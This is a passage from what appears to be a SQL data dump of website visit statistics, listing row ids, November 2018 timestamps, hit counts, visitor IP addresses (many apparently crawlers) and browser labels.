,0,'54.36.148.99','other'),(323761,1541126069,1,1,0,0,'54.36.149.66','other'),(323762,1541126215,1,1,0,0,'216.244.66.241','other'),(323763,1541126473,1,1,0,0,'54.36.148.135','other'),(323764,1541126510,6,6,0,0,'178.154.244.29','other'),(323765,1541126517,4,4,0,0,'178.154.244.11','other'),(323766,1541126650,1,1,0,0,'66.249.75.220','chrome'),(323767,1541126712,1,1,0,0,'134.249.55.216','chrome'),(323768,1541127318,1,1,0,0,'54.36.149.99','other'),(323769,1541127644,4,4,0,0,'178.154.244.29','other'),(323770,1541127664,1,1,0,0,'8.29.198.27','other'),(323771,1541127763,1,1,0,0,'54.36.148.100','other'),(323772,1541128068,4,4,0,0,'178.154.244.11','other'),(323773,1541128178,1,1,0,0,'216.244.66.241','other'),(323774,1541128218,1,1,0,0,'207.46.13.216','other'),(323775,1541128242,1,1,0,0,'5.45.207.79','other'),(323776,1541128736,2,2,0,0,'95.163.255.114','other'),(323777,1541128745,1,1,0,0,'95.163.255.109','other'),(323778,1541128751,1,1,0,0,'95.163.255.117','other'),(323779,1541128756,2,2,0,0,'95.163.255.108','other'),(323780,1541128769,3,3,0,0,'95.163.255.107','other'),(323781,1541128774,1,1,0,0,'95.163.255.102','other'),(323782,1541128780,1,1,0,0,'95.163.255.113','other'),(323783,1541128799,1,1,0,0,'95.163.255.105','other'),(323784,1541128805,1,1,0,0,'95.163.255.103','other'),(323785,1541128812,1,1,0,0,'95.163.255.116','other'),(323786,1541128917,2,2,0,0,'8.29.198.26','other'),(323787,1541128919,1,1,0,0,'178.154.244.29','other'),(323788,1541130134,1,1,0,0,'66.249.75.201','chrome'),(323789,1541130135,1,1,0,0,'66.249.75.222','chrome'),(323790,1541130268,1,1,0,0,'54.36.148.177','other'),(323791,1541130345,1,1,0,0,'95.163.255.95','other'),(323792,1541130348,1,1,0,0,'95.163.255.93','other'),(323793,1541130815,1,1,0,0,'54.36.148.113','other'),(323794,1541131031,1,1,0,0,'54.36.149.88','other'),(323795,1541131130,1,1,0,0,'54.36.149.18','other'),(323796,1541131773,3,3,0,0,'178.154.244.29','other'),(323797,1541131913,1,1,0,0,'54.36.148.117','other'),(323798,1541131935,1,1,0,0,'178.154.244.11','other'),(323799,1541132056,2,2,0,0,'5.45.207.79','other'),(323800,1541132118,1,1,0,0,'66.249.75.199','chrome'),(323801,1541132119,1,1,0,0,'66.249.75.220','chrome'),(323802,1541132267,1,1,0,0,'54.36.148.122','other'),(323803,1541132487,1,1,0,0,'54.36.149.31','other'),(323804,1541132731,1,1,0,0,'54.36.148.82','other'),(323805,1541132924,1,1,0,0,'66.249.75.218','chrome'),(323806,1541132958,1,1,0,0,'207.46.13.216','other'),(323807,1541132993,1,1,0,0,'66.102.9.136','chrome'),(323808,1541133000,1,1,0,0,'46.211.109.109','chrome'),(323809,1541133013,1,1,0,0,'37.9.113.103','other'),(323810,1541133179,2,2,0,0,'5.45.207.79','other'),(323811,1541133213,4,4,0,0,'178.154.244.11','other'),(323812,1541133255,1,1,0,0,'54.36.148.13','other'),(323813,1541133495,1,1,0,0,'95.163.255.119','other'),(323814,1541133504,1,1,0,0,'95.163.255.108','other'),(323815,1541133537,1,1,0,0,'54.36.148.79','other'),(323816,1541133689,1,1,0,0,'54.36.148.198','other'),(323817,1541133744,2,2,0,0,'5.45.207.19','other'),(323818,1541133804,1,1,0,0,'54.36.148.69','other'),(323819,1541133867,1,1,0,0,'178.154.244.29','other'),(323820,1541133949,1,1,0,0,'54.36.149.53','other'),(323821,1541134016,1,1,0,0,'5.255.253.38','other'),(323822,1541135107,1,1,0,0,'54.36.149.68','other'),(323823,1541135279,1,1,0,0,'54.36.149.76','other'),(323824,1541135361,1,1,0,0,'54.36.148.137','other'),(323825,1541135641,1,1,0,0,'54.36.148.120','other'),(323826,1541136292,10,10,0,0,'178.154.244.29','other'),(323827,1541136346,3,3,0,0,'178.154.244.11','other'),(323828,1541136456,1,1,0,0,'87.250.224.47','other'),(323829,1541136518,1,1,0,0,'54.36.148.226','other'),(323830,1541137043,2,2,0,0,'91.196.178.133','firefox'),(323831,1541137050,1,1,0,0,'54.36.148.72','other'),(323832,1541137247,2,2,0,0,'5.45.207.79','other'),(323833,1541137277,3,3,0,0,'178.154.244.29','other'),(323834,1541137302,1,1,0,0,'54.36.148.93','other'),(323835,1541138014,3,3,0,0,'178.154.244.11','other'),(323836,1541138273,1,1,0,0,'66.249.75.201','chrome'),(323837,1541138274,1,1,0,0,'66.249.75.220','chrome'),(323838,1541138409,2,2,0,0,'178.154.244.29','other'),(323839,1541138501,1,1,0,0,'8.29.198.25','other'),(323840,1541138605,1,1,0,0,'54.36.148.102','other'),(323841,1541138991,1,1,0,0,'54.36.148.146','other'),(323842,1541139232,1,1,0,0,'178.154.244.11','other'),(323843,1541139315,1,1,0,0,'54.36.149.59','other'),(323844,1541139405,1,1,0,0,'46.229.168.154','other'),(323845,1541139453,3,3,0,0,'66.249.75.199','chrome'),(323846,1541139454,2,2,0,0,'66.249.75.220','chrome'),(323847,1541139466,1,1,0,0,'54.36.149.49','other'),(323848,1541139566,2,2,0,0,'66.249.75.218','chrome'),(323849,1541139581,2,2,0,0,'66.249.75.195','chrome'),(323850,1541139602,1,1,0,0,'66.249.75.222','chrome'),(323851,1541139649,1,1,0,0,'54.36.148.220','other'),(323852,1541139777,1,1,0,0,'8.29.198.26','other'),(323853,1541140193,1,1,0,0,'8.29.198.25','other'),(323854,1541140716,1,1,0,0,'54.36.148.36','other'),(323855,1541140876,2,2,0,0,'216.244.66.241','other'),(323856,1541141307,3,3,0,0,'66.249.75.199','chrome'),(323857,1541141308,2,2,0,0,'66.249.75.222','chrome'),(323858,1541141360,3,3,0,0,'66.249.75.195','chrome'),(323860,1541141390,4,4,0,0,'66.249.75.220','chrome'),(323861,1541141415,2,2,0,0,'66.249.75.201','chrome'),(323862,1541141417,2,2,0,0,'66.249.75.218','chrome'),(323863,1541141994,1,1,0,0,'66.249.76.109','chrome'),(323864,1541142026,2,2,0,0,'95.132.56.187','firefox'),(323865,1541142325,2,2,0,0,'66.249.75.199','chrome'),(323867,1541142525,1,1,0,0,'54.36.148.113','other'),(323868,1541142710,1,1,0,0,'54.36.148.128','other'),(323869,1541142719,4,4,0,0,'66.249.75.218','chrome'),(323870,1541142826,1,1,0,0,'54.36.148.245','other'),(323871,1541142967,2,2,0,0,'66.249.75.201','chrome'),(323872,1541142975,1,1,0,0,'66.249.75.195','chrome'),(323873,1541142980,2,2,0,0,'91.124.182.170','firefox'),(323874,1541142989,1,1,0,0,'54.36.148.207','other'),(323875,1541143004,1,1,0,0,'54.36.148.204','other'),(323876,1541143394,1,1,0,0,'54.36.149.27','other'),(323877,1541143441,2,2,0,0,'66.249.69.140','chrome'),(323878,1541143491,1,1,0,0,'34.230.14.97','chrome'),(323879,1541143664,1,1,0,0,'95.163.255.97','other'),(323880,1541143667,1,1,0,0,'95.163.255.98','other'),(323881,1541143732,1,1,0,0,'193.160.224.150','chrome'),(323882,1541143750,11,11,0,0,'66.249.75.218','chrome'),(323883,1541143806,5,5,0,0,'66.249.75.220','chrome'),(323884,1541143857,2,2,0,0,'91.196.178.169','chrome'),(323885,1541143938,6,6,0,0,'66.249.75.222','chrome'),(323886,1541144063,1,1,0,0,'66.249.69.144','chrome'),(323887,1541144145,3,3,0,0,'216.244.66.241','other'),(323888,1541144175,1,1,0,0,'54.36.149.96','other'),(323889,1541144207,4,4,0,0,'66.249.75.199','chrome'),(323890,1541144210,1,1,0,0,'54.36.148.199','other'),(323891,1541144356,2,2,0,0,'66.249.75.195','chrome'),(323892,1541144412,1,1,0,0,'54.36.148.101','other'),(323893,1541144464,1,1,0,0,'66.249.75.201','chrome'),(323894,1541144576,1,1,0,0,'54.36.148.125','other'),(323895,1541144916,1,1,0,0,'54.36.148.59','other'),(323896,1541144922,6,6,0,0,'66.249.75.220','chrome'),(323897,1541144926,7,7,0,0,'66.249.75.218','chrome'),(323898,1541144979,2,2,0,0,'195.230.119.58','chrome'),(323899,1541145262,1,1,0,0,'207.46.13.216','other'),(323900,1541145328,1,1,0,0,'66.102.9.134','chrome'),(323902,1541145403,3,3,0,0,'66.249.75.222','chrome'),(323903,1541145415,2,2,0,0,'66.249.75.195','chrome'),(323904,1541145456,1,1,0,0,'51.255.65.46','other'),(323905,1541145606,1,1,0,0,'54.36.149.12','other'),(323906,1541145698,2,2,0,0,'216.244.66.241','other'),(323907,1541145755,2,2,0,0,'94.179.147.128','chrome'),(323908,1541145762,1,1,0,0,'54.36.148.187','other'),(323909,1541145842,10,10,0,0,'66.249.75.218','chrome'),(323910,1541145917,1,1,0,0,'54.36.148.168','other'),(323911,1541145982,6,6,0,0,'66.249.75.220','chrome'),(323912,1541145989,1,1,0,0,'66.249.69.144','chrome'),(323913,1541146143,1,1,0,0,'54.36.148.26','other'),(323914,1541146362,3,3,0,0,'66.249.75.195','chrome'),(323915,1541146414,3,3,0,0,'91.196.178.168','chrome'),(323916,1541146920,1,1,0,0,'54.36.149.28','other'),(323917,1541147060,2,2,0,0,'66.249.75.199','chrome'),(323919,1541147249,2,2,0,0,'66.249.75.201','chrome'),(323921,1541147265,1,1,0,0,'66.249.69.144','chrome'),(323922,1541147430,1,1,0,0,'46.229.168.139','other'),(323923,1541147432,1,1,0,0,'46.229.168.134','other'),(323924,1541147486,2,2,0,0,'163.172.4.153','chrome'),(323925,1541147763,4,4,0,0,'66.249.75.195','chrome'),(323926,1541147764,6,6,0,0,'66.249.75.218','chrome'),(323927,1541147768,2,2,0,0,'66.249.75.220','chrome'),(323928,1541147909,2,2,0,0,'31.43.60.176','chrome'),(323929,1541147953,1,1,0,0,'54.36.148.159','other'),(323930,1541148200,1,1,0,0,'66.249.75.201','chrome'),(323931,1541148201,3,3,0,0,'66.249.75.222','chrome'),(323932,1541148204,3,3,0,0,'66.249.75.199','chrome'),(323933,1541148356,1,1,0,0,'54.36.149.25','other'),(323934,1541148554,1,1,0,0,'54.36.148.100','other'),(323935,1541148682,1,1,0,0,'66.249.69.156','chrome'),(323936,1541148683,1,1,0,0,'66.249.69.142','chrome'),(323937,1541148742,26,26,0,0,'66.249.75.195','chrome'),(323938,1541148743,7,7,0,0,'66.249.75.220','chrome'),(323939,1541148980,27,27,0,0,'66.249.75.218','chrome'),(323940,1541149034,1,1,0,0,'54.36.149.42','other'),(323941,1541149056,2,2,0,0,'94.179.176.137','chrome'),(323942,1541149096,1,1,0,0,'46.229.168.129','other'),(323943,1541149107,3,3,0,0,'66.249.75.201','chrome'),(323944,1541149108,4,4,0,0,'66.249.75.222','chrome'),(323945,1541149127,14,14,0,0,'66.249.75.199','chrome'),(323946,1541149272,1,1,0,0,'54.36.148.74','other'),(323947,1541149338,1,1,0,0,'8.29.198.26','other'),(323948,1541149436,1,1,0,0,'54.36.148.97','other'),(323949,1541149438,1,1,0,0,'54.36.148.80','other'),(323950,1541149516,1,1,0,0,'54.36.149.34','other'),(323951,1541149789,5,5,0,0,'66.249.75.195','chrome'),(323952,1541149833,4,4,0,0,'66.249.75.220','chrome'),(323953,1541149869,1,1,0,0,'54.36.148.125','other'),(323954,1541149910,8,8,0,0,'66.249.75.218','chrome'),(323955,1541149923,1,1,0,0,'54.36.149.27','other'),(323956,1541150036,2,2,0,0,'91.196.178.79','chrome'),(323957,1541150045,1,1,0,0,'54.36.148.101','other'),(323958,1541150186,1,1,0,0,'54.36.148.244','other'),(323959,1541150210,1,1,0,0,'54.36.148.168','other'),(323960,1541150262,1,1,0,0,'54.36.148.103','other'),(323961,1541150267,2,2,0,0,'66.249.75.222','chrome'),(323962,1541150604,4,4,0,0,'216.244.66.241','other'),(323963,1541150629,1,1,0,0,'8.29.198.27','other'),(323964,1541150789,7,7,0,0,'66.249.75.199','chrome'),(323965,1541150790,8,8,0,0,'66.249.75.220','chrome'),(323966,1541150797,104,104,0,0,'66.249.75.195','chrome'),(323967,1541150813,99,99,0,0,'66.249.75.218','chrome'),(323968,1541150911,1,1,0,0,'54.36.148.218','other'),(323969,1541151043,1,1,0,0,'8.29.198.26','other'),(323970,1541151082,2,2,0,0,'94.179.176.137','chrome'),(323971,1541151122,2,2,0,0,'66.249.75.201','chrome'),(323972,1541151174,1,1,0,0,'54.36.149.19','other'),(323973,1541151256,1,1,0,0,'46.229.168.146','other'),(323974,1541151260,1,1,0,0,'46.229.168.136','other'),(323975,1541151264,1,1,0,0,'54.36.148.39','other'),(323976,1541151282,1,1,0,0,'54.36.148.124','other'),(323977,1541151538,1,1,0,0,'54.36.148.144','other'),(323978,1541151541,1,1,0,0,'216.244.66.241','other'),(323979,1541151579,1,1,0,0,'54.36.148.148','other'),(323980,1541151612,1,1,0,0,'54.36.149.9','other'),(323981,1541151624,1,1,0,0,'54.36.149.38','other'),(323982,1541151631,1,1,0,0,'54.36.148.157','other'),(323983,1541151752,28,28,0,0,'66.249.75.195','chrome'),(323985,1541151763,30,30,0,0,'66.249.75.218','chrome'),(323986,1541151816,5,5,0,0,'66.249.75.199','chrome'),(323987,1541151905,4,4,0,0,'66.249.75.222','chrome'),(323988,1541151932,1,1,0,0,'54.36.149.34','other'),(323989,1541152088,1,1,0,0,'54.36.148.80','other'),(323990,1541152184,1,1,0,0,'54.36.148.193','other'),(323991,1541152327,1,1,0,0,'40.77.167.99','other'),(323992,1541152364,1,1,0,0,'54.36.149.44','other'),(323993,1541152492,6,6,0,0,'66.249.75.201','chrome'),(323994,1541152493,8,8,0,0,'66.249.75.220','chrome'),(323995,1541152701,45,45,0,0,'66.249.75.195','chrome'),(323997,1541152712,46,46,0,0,'66.249.75.218','chrome'),(323998,1541152874,7,7,0,0,'66.249.75.199','chrome'),(323999,1541152915,1,1,0,0,'54.36.148.151','other'),(324000,1541152945,1,1,0,0,'54.36.148.157','other'),(324001,1541153044,1,1,0,0,'62.205.134.182','msie'),(324002,1541153063,2,2,0,0,'91.196.178.168','chrome'),(324003,1541153115,1,1,0,0,'66.249.75.222','chrome'),(324004,1541153412,5,5,0,0,'66.249.75.220','chrome'),(324005,1541153486,1,1,0,0,'66.249.75.201','chrome'),(324006,1541153721,1,1,0,0,'207.46.13.216','other'),(324007,1541153859,1,1,0,0,'54.36.149.95','other'),(324008,1541153877,47,47,0,0,'66.249.75.195','chrome'),(324009,1541153878,45,45,0,0,'66.249.75.218','chrome'),(324010,1541154004,1,1,0,0,'54.36.149.1','other'),(324011,1541154037,1,1,0,0,'40.77.167.99','other'),(324012,1541154085,4,4,0,0,'66.249.75.199','chrome'),(324013,1541154122,3,3,0,0,'66.249.75.222','chrome'),(324014,1541154145,1,1,0,0,'54.36.148.224','other'),(324015,1541154209,1,1,0,0,'54.36.149.28','other'),(324016,1541154379,3,3,0,0,'66.249.75.220','chrome'),(324017,1541154423,2,2,0,0,'66.249.75.201','chrome'),(324018,1541154471,1,1,0,0,'66.249.69.158','chrome'),(324019,1541154472,1,1,0,0,'66.249.69.142','chrome'),(324020,1541154708,1,1,0,0,'207.46.13.216','other'),(324021,1541154780,8,8,0,0,'66.249.75.195','chrome'),(324022,1541154812,9,9,0,0,'66.249.75.218','chrome'),(324023,1541154938,1,1,0,0,'54.36.149.43','other'),(324025,1541155005,3,3,0,0,'178.154.244.11','other'),(324026,1541155018,5,5,0,0,'178.154.244.29','other'),(324027,1541155021,1,1,0,0,'66.249.75.199','chrome'),(324028,1541155075,2,2,0,0,'91.196.178.79','chrome'),(324029,1541155257,1,1,0,0,'54.36.149.70','other'),(324030,1541155268,1,1,0,0,'54.36.149.63','other'),(324031,1541155496,1,1,0,0,'54.36.148.133','other'),(324032,1541155528,8,8,0,0,'66.249.75.222','chrome'),(324033,1541155607,2,2,0,0,'66.249.75.201','chrome'),(324034,1541155659,1,1,0,0,'54.36.149.10','other'),(324035,1541155844,59,59,0,0,'66.249.75.218','chrome'),(324036,1541155864,17,17,0,0,'66.249.75.195','chrome'),(324037,1541155868,13,13,0,0,'66.249.75.220','chrome'),(324038,1541155949,2,2,0,0,'91.124.182.170','firefox'),(324039,1541156036,8,8,0,0,'178.154.244.29','other'),(324040,1541156101,3,3,0,0,'66.249.75.199','chrome'),(324041,1541156142,1,1,0,0,'141.8.142.103','other'),(324042,1541156526,1,1,0,0,'66.249.75.28','chrome'),(324043,1541156527,1,1,0,0,'66.249.75.13','chrome'),(324044,1541156582,2,2,0,0,'66.249.75.222','chrome'),(324045,1541156645,2,2,0,0,'195.114.136.99','firefox'),(324046,1541156671,1,1,0,0,'216.244.66.241','other'),(324047,1541156795,4,4,0,0,'66.249.75.220','chrome'),(324048,1541156813,1,1,0,0,'46.229.168.154','other'),(324049,1541156815,1,1,0,0,'46.229.168.139','other'),(324050,1541156950,3,3,0,0,'66.249.75.195','chrome'),(324051,1541156984,3,3,0,0,'66.249.75.218','chrome'),(324052,1541157057,1,1,0,0,'66.249.75.199','chrome'),(324053,1541157167,3,3,0,0,'66.249.75.201','chrome'),(324054,1541157204,1,1,0,0,'54.36.149.84','other'),(324055,1541157268,1,1,0,0,'80.90.55.172','other'),(324056,1541157299,2,2,0,0,'178.154.244.29','other'),(324057,1541157348,2,2,0,0,'178.154.244.11','other'),(324058,1541157519,1,1,0,0,'54.36.148.156','other'),(324059,1541157608,1,1,0,0,'54.36.149.72','other'),(324060,1541157819,1,1,0,0,'66.249.75.28','chrome'),(324061,1541157820,1,1,0,0,'66.249.75.16','chrome'),(324062,1541157871,6,6,0,0,'66.249.75.220','chrome'),(324063,1541157937,3,3,0,0,'66.249.75.222','chrome'),(324064,1541157942,14,14,0,0,'66.249.75.218','chrome'),(324065,1541157958,1,1,0,0,'54.36.149.14','other'),(324066,1541157985,2,2,0,0,'66.249.75.13','chrome'),(324067,1541158013,1,1,0,0,'54.36.149.71','other'),(324068,1541158037,1,1,0,0,'66.249.75.15','chrome'),(324069,1541158102,1,1,0,0,'66.249.75.29','chrome'),(324070,1541158119,3,3,0,0,'66.249.75.199','chrome'),(324071,1541158335,1,1,0,0,'54.36.148.252','other'),(324072,1541158742,1,1,0,0,'66.249.75.16','chrome'),(324073,1541158873,8,8,0,0,'66.249.75.220','chrome'),(324074,1541158883,14,14,0,0,'66.249.75.218','chrome'),(324075,1541159189,3,3,0,0,'66.249.75.222','chrome'),(324076,1541159302,1,1,0,0,'54.36.149.8','other'),(324077,1541159319,1,1,0,0,'54.36.148.133','other'),(324078,1541159506,1,1,0,0,'54.36.149.94','other'),(324079,1541159578,2,2,0,0,'66.249.75.199','chrome'),(324080,1541159881,1,1,0,0,'54.36.148.137','other'),(324081,1541159916,1,1,0,0,'54.36.148.157','other'),(324082,1541159918,3,3,0,0,'66.249.75.220','chrome'),(324083,1541159919,1,1,0,0,'66.249.75.201','chrome'),(324084,1541159954,12,12,0,0,'66.249.75.218','chrome'),(324085,1541160171,1,1,0,0,'66.249.75.222','chrome'),(324086,1541160179,1,1,0,0,'8.29.198.27','other'),(324087,1541160197,1,1,0,0,'95.163.255.98','other'),(324088,1541160199,1,1,0,0,'95.163.255.92','other'),(324089,1541160447,1,1,0,0,'54.36.148.242','other'),(324090,1541160565,2,2,0,0,'144.76.2.149','other'),(324091,1541160782,1,1,0,0,'46.229.168.153','other'),(324092,1541160784,1,1,0,0,'46.229.168.147','other'),(324093,1541160797,2,2,0,0,'178.154.244.29','other'),(324094,1541160888,2,2,0,0,'91.196.178.75','firefox'),(324095,1541161181,1,1,0,0,'146.185.157.240','chrome'),(324096,1541161235,3,3,0,0,'66.249.75.220','chrome'),(324097,1541161305,3,3,0,0,'216.244.66.241','other'),(324098,1541161461,1,1,0,0,'54.36.148.162','other'),(324099,1541161477,2,2,0,0,'8.29.198.25','other'),(324100,1541162020,1,1,0,0,'66.249.75.13','chrome'),(324101,1541162036,1,1,0,0,'82.196.2.172','chrome'),(324102,1541162074,4,4,0,0,'66.249.75.218','chrome'),(324103,1541162161,1,1,0,0,'95.135.46.61','chrome'),(324104,1541162190,1,1,0,0,'66.249.75.201','chrome'),(324105,1541162191,3,3,0,0,'66.249.75.222','chrome'),(324106,1541162566,1,1,0,0,'95.134.189.19','chrome'),(324107,1541163131,3,3,0,0,'66.249.75.220','chrome'),(324108,1541163317,1,1,0,0,'66.249.75.222','chrome'),(324109,1541163383,2,2,0,0,'207.46.13.117','other'),(324110,1541163601,1,1,0,0,'54.36.148.43','other'),(324111,1541164240,1,1,0,0,'193.106.30.98','firefox'),(324112,1541164263,1,1,0,0,'54.36.149.64','other'),(324113,1541164278,1,1,0,0,'54.36.149.99','other'),(324114,1541164449,1,1,0,0,'54.36.148.60','other'),(324115,1541164478,1,1,0,0,'54.36.149.36','other'),(324116,1541164479,1,1,0,0,'178.154.244.29','other'),(324117,1541164712,1,1,0,0,'66.249.75.199','chrome'),(324119,1541165020,1,1,0,0,'54.165.59.7','other'),(324120,1541165091,2,2,0,0,'91.196.178.66','firefox'),(324121,1541165300,1,1,0,0,'54.36.149.14','other'),(324122,1541165421,1,1,0,0,'54.36.148.60','other'),(324123,1541165557,1,1,0,0,'54.36.148.73','other'),(324124,1541165656,1,1,0,0,'54.36.148.61','other'),(324125,1541165661,2,2,0,0,'207.46.13.117','other'),(324126,1541165767,1,1,0,0,'95.163.255.98','other'),(324127,1541165770,1,1,0,0,'95.163.255.93','other'),(324128,1541165800,2,2,0,0,'66.249.75.222','chrome'),(324129,1541165849,2,2,0,0,'178.95.252.141','chrome'),(324130,1541165932,1,1,0,0,'54.36.148.129','other'),(324131,1541165945,1,1,0,0,'46.229.168.147','other'),(324132,1541165946,1,1,0,0,'46.229.168.150','other'),(324133,1541165975,30,30,0,0,'173.208.200.154','other'),(324134,1541166088,2,2,0,0,'66.249.75.220','chrome'),(324135,1541166185,2,2,0,0,'207.46.13.216','other'),(324136,1541166201,2,2,0,0,'92.112.30.168','chrome'),(324137,1541166238,1,1,0,0,'54.36.148.185','other'),(324138,1541166423,1,1,0,0,'91.196.178.166','chrome'),(324139,1541166478,1,1,0,0,'54.36.148.114','other'),(324140,1541166706,2,2,0,0,'216.244.66.241','other'),(324141,1541166767,1,1,0,0,'54.36.148.225','other'),(324142,1541166847,2,2,0,0,'54.165.59.7','other'),(324143,1541166978,1,1,0,0,'54.36.149.81','other'),(324144,1541167004,4,4,0,0,'66.249.75.222','chrome'),(324145,1541167056,1,1,0,0,'54.36.148.115','other'),(324146,1541167136,2,2,0,0,'66.249.75.220','chrome'),(324147,1541167413,1,1,0,0,'66.249.75.30','chrome'),(324148,1541167414,1,1,0,0,'66.249.75.16','chrome'),(324149,1541167702,1,1,0,0,'54.36.149.63','other'),(324150,1541167924,1,1,0,0,'216.244.66.241','other'),(324151,1541167989,1,1,0,0,'54.165.59.7','other'),(324152,1541168011,1,1,0,0,'66.249.75.218','chrome'),(324153,1541168186,1,1,0,0,'66.249.75.222','chrome'),(324154,1541168192,1,1,0,0,'95.163.255.93','other'),(324155,1541168195,1,1,0,0,'95.163.255.97','other'),(324156,1541168197,1,1,0,0,'213.159.251.221','chrome'),(324157,1541168580,1,1,0,0,'54.36.149.52','other'),(324158,1541168758,1,1,0,0,'54.36.148.224','other'),(324159,1541168937,102,102,0,0,'5.9.141.8','other'),(324160,1541169390,1,1,0,0,'54.36.149.89','other'),(324161,1541169691,1,1,0,0,'54.165.59.7','other'),(324162,1541169812,1,1,0,0,'54.36.148.71','other'),(324163,1541170294,1,1,0,0,'5.45.207.79','other'),(324164,1541170414,1,1,0,0,'54.36.148.107','other'),(324165,1541170512,1,1,0,0,'54.36.149.16','other'),(324166,1541170805,1,1,0,0,'54.36.149.26','other'),(324167,1541171015,1,1,0,0,'8.29.198.25','other'),(324168,1541171338,1,1,0,0,'54.36.148.221','other'),(324169,1541171343,1,1,0,0,'207.46.13.117','other'),(324170,1541171419,1,1,0,0,'54.165.59.7','other'),(324171,1541171902,1,1,0,0,'66.249.75.13','chrome'),(324172,1541172069,1,1,0,0,'54.36.149.16','other'),(324173,1541172137,1,1,0,0,'54.36.149.62','other'),(324174,1541172261,1,1,0,0,'54.36.148.202','other'),(324175,1541172365,1,1,0,0,'8.29.198.25','other'),(324176,1541172393,2,2,0,0,'66.249.75.201','chrome'),(324177,1541172405,1,1,0,0,'66.249.75.218','chrome'),(324178,1541172470,1,1,0,0,'5.45.207.19','other'),(324179,1541172521,1,1,0,0,'178.154.244.11','other'),(324180,1541172583,1,1,0,0,'54.36.148.195','other'),(324181,1541172648,1,1,0,0,'66.249.75.220','chrome'),(324182,1541172725,2,2,0,0,'66.249.75.222','chrome'),(324183,1541172738,1,1,0,0,'8.29.198.27','other'),(324184,1541173063,1,1,0,0,'54.36.148.164','other'),(324185,1541173093,1,1,0,0,'54.36.149.68','other'),(324186,1541173465,1,1,0,0,'141.8.142.144','other'),(324187,1541173468,1,1,0,0,'87.250.224.64','other'),(324188,1541173812,1,1,0,0,'54.36.148.227','other'),(324189,1541174556,1,1,0,0,'216.244.66.241','other'),(324190,1541174598,1,1,0,0,'66.249.75.195','chrome'),(324191,1541174759,1,1,0,0,'180.76.15.159','other'),(324192,1541174760,1,1,0,0,'180.76.15.137','other'),(324193,1541175011,1,1,0,0,'178.154.244.29','other'),(324194,1541175477,2,2,0,0,'62.205.134.182','msie'),(324195,1541175831,1,1,0,0,'54.36.148.94','other'),(324196,1541176098,1,1,0,0,'54.36.148.177','other'),(324197,1541176102,3,3,0,0,'216.244.66.241','other'),(324198,1541176103,1,1,0,0,'178.154.244.29','other'),(324199,1541176134,1,1,0,0,'141.8.142.103','other'),(324200,1541176469,2,2,0,0,'46.211.121.236','chrome'),(324201,1541176778,1,1,0,0,'54.36.148.17','other'),(324202,1541177026,1,1,0,0,'79.110.130.188','other'),(324203,1541177087,2,2,0,0,'54.36.148.253','other'),(324204,1541177341,1,1,0,0,'178.154.244.29','other'),(324205,1541177564,1,1,0,0,'54.36.149.57','other'),(324206,1541177810,2,1,1,0,'66.249.75.13',''),(324207,1541177906,1,1,0,0,'54.36.148.31','other'),(324208,1541177935,1,1,0,0,'54.36.148.153','other'),(324209,1541178245,1,1,0,0,'54.36.148.218','other'),(324210,1541178502,2,0,2,0,'66.249.75.15',''),(324211,1541178526,1,1,0,0,'54.36.148.35','other'),(324212,1541178597,1,1,0,0,'95.163.255.112','other'),(324213,1541178606,1,1,0,0,'95.163.255.109','other'),(324214,1541178723,12,12,0,0,'178.154.244.29','other'),(324215,1541178899,4,4,0,0,'216.244.66.241','other'),(324216,1541178913,2,2,0,0,'5.45.207.19','other'),(324217,1541178927,4,4,0,0,'5.45.207.79','other'),(324218,1541179085,1,1,0,0,'54.36.148.42','other'),(324219,1541179120,12,12,0,0,'66.249.75.220','chrome'),(324220,1541179135,15,15,0,0,'178.154.244.11','other'),(324221,1541179190,24,24,0,0,'66.249.75.218','chrome'),(324222,1541179383,2,2,0,0,'66.249.75.222','chrome'),(324223,1541179390,1,1,0,0,'54.36.148.180','other'),(324224,1541179482,1,1,0,0,'66.249.75.28','chrome'),(324225,1541179483,1,1,0,0,'66.249.75.16','chrome'),(324226,1541179582,2,2,0,0,'66.249.75.13','chrome'),(324227,1541179658,16,16,0,0,'178.154.244.29','other'),(324228,1541179729,1,1,0,0,'54.36.148.48','other'),(324230,1541179880,2,2,0,0,'5.45.207.19','other'),(324231,1541180060,1,1,0,0,'216.244.66.241','other'),(324232,1541180093,17,17,0,0,'178.154.244.11','other'),(324233,1541180104,3,3,0,0,'5.45.207.79','other'),(324234,1541180110,1,1,0,0,'54.36.148.89','other'),(324235,1541180134,1,1,0,0,'54.36.148.97','other'),(324236,1541180245,1,1,0,0,'54.36.148.212','other'),(324237,1541180559,12,12,0,0,'178.154.244.29','other'),(324238,1541180574,1,1,0,0,'207.46.13.216','other'),(324239,1541180907,3,0,3,0,'66.249.75.13',''),(324240,1541180908,1,1,0,0,'54.36.148.92','other'),(324241,1541180968,1,1,0,0,'54.36.148.184','other'),(324242,1541180997,4,4,0,0,'178.154.244.11','other'),(324243,1541181018,1,1,0,0,'95.108.213.4','other'),(324244,1541181513,8,8,0,0,'66.249.75.222','chrome'),(324245,1541181534,11,11,0,0,'66.249.75.220','chrome'),(324246,1541181545,23,23,0,0,'66.249.75.218','chrome'),(324247,1541181630,5,5,0,0,'66.249.75.195','chrome'),(324248,1541181854,1,1,0,0,'8.29.198.26','other'),(324249,1541181921,2,2,0,0,'66.249.75.201','chrome'),(324250,1541182165,1,1,0,0,'66.249.75.199','chrome'),(324251,1541182235,1,1,0,0,'54.36.148.57','other'),(324252,1541182315,1,1,0,0,'5.45.207.19','other'),(324253,1541182400,1,1,0,0,'95.163.255.97','other'),(324254,1541182402,1,1,0,0,'95.163.255.94','other'),(324255,1541182475,7,7,0,0,'66.249.75.218','chrome'),(324256,1541182501,1,1,0,0,'66.249.75.220','chrome'),(324257,1541182637,1,1,0,0,'216.244.66.241','other'),(324258,1541182640,1,1,0,0,'66.249.75.222','chrome'),(324259,1541182789,1,1,0,0,'54.36.148.48','other'),(324260,1541183053,1,1,0,0,'54.36.148.154','other'),(324261,1541183079,1,1,0,0,'54.36.148.243','other'),(324262,1541183083,1,1,0,0,'46.229.168.133','other'),(324263,1541183235,1,1,0,0,'54.36.148.161','other'),(324264,1541183268,1,1,0,0,'8.29.198.26','other'),(324265,1541183571,1,1,0,0,'8.29.198.27','other'),(324266,1541183696,1,1,0,0,'66.249.75.28','chrome'),(324267,1541183697,1,1,0,0,'66.249.75.13','chrome'),(324268,1541183701,1,1,0,0,'54.36.148.171','other'),(324269,1541184082,2,2,0,0,'91.196.178.174','chrome'),(324270,1541184350,1,1,0,0,'54.36.148.11','other'),(324271,1541184451,2,2,0,0,'66.249.75.16','chrome'),(324272,1541184539,1,1,0,0,'66.249.75.15','chrome'),(324273,1541184579,1,1,0,0,'54.36.148.92','other'),(324274,1